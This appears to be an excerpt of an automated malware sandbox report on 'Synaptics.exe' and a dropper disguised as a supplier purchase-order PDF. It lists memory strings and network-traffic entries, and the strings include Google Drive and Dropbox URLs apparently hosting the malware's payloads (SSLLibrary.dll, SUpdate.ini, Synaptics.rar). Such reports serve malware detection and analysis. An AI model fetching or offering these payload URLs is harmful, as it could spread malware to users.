                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrightn
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrver:
                              Source: Synaptics.exe, 00000003.00000002.2645686279.00000000006AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrvice
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-Se
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-uri
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion:
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtions
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduH
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadua-pl
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadur
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2655247190.0000000007080000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw.gof
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwX
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwsq
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwx5
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwzY
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE40000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxg6Xg_
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649692631.0000000005530000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyn%
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690870771.000000000F032000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzV
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzsN
                              Source: Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzzl
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2660837811.00000000071B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2682396163.000000000EF06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: Synaptics.exe, 00000003.00000002.2660837811.000000000720A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~=
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~A
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.userc
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/-
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2645686279.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2680758777.000000000EE9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWyr7
                              Source: Synaptics.exe, 00000003.00000002.2649692631.0000000005570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWyr77E
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2678740944.000000000EDE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc&HR
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadce
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclick-c
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn-
                              Source: Synaptics.exe, 00000003.00000002.2678740944.000000000EDF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuM
                              Source: Synaptics.exe, 00000003.00000002.2645686279.0000000000656000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadicy
                              Source: Synaptics.exe, 00000003.00000002.2688843389.000000000EFAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: New PO - Supplier 16-12-2024-Pdf.exe, 00000000.00000003.2161596222.0000000002400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Synaptics.exe, 00000003.00000003.2237237113.000000000061F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.2646956253.0000000001FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
